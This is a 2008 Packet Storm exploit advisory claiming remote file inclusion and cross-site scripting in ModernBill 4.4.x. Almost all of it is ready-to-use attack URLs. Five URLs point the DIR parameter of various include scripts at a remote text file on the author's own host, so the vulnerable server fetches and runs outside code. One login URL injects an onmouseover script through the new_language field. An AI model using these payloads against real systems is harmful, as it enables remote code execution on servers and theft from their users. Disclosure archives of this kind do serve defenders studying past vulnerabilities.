modernbill-xssrfi.txt

2008-11-01T00:00:00
ID PACKETSTORM:71445
Type packetstorm
Reporter nigh7f411
Modified 2008-11-01T00:00:00

Description

                                        
                                            `**************************************************************************************  
ModernBill .:. Client Billing System - User Login  
ModernBill <= v4.4.X Remote File Inclusion Vulnerability and xss by nigh7f411  
http://xc0r3.net/  
plezz go to ttp://xc0r3.net/forums/  
**************************************************************************************  
  
rfi  
http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?  
http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?  
http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?  
http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?  
http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?  
  
xss  
http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+  
  
**************************************************************************************  
  
`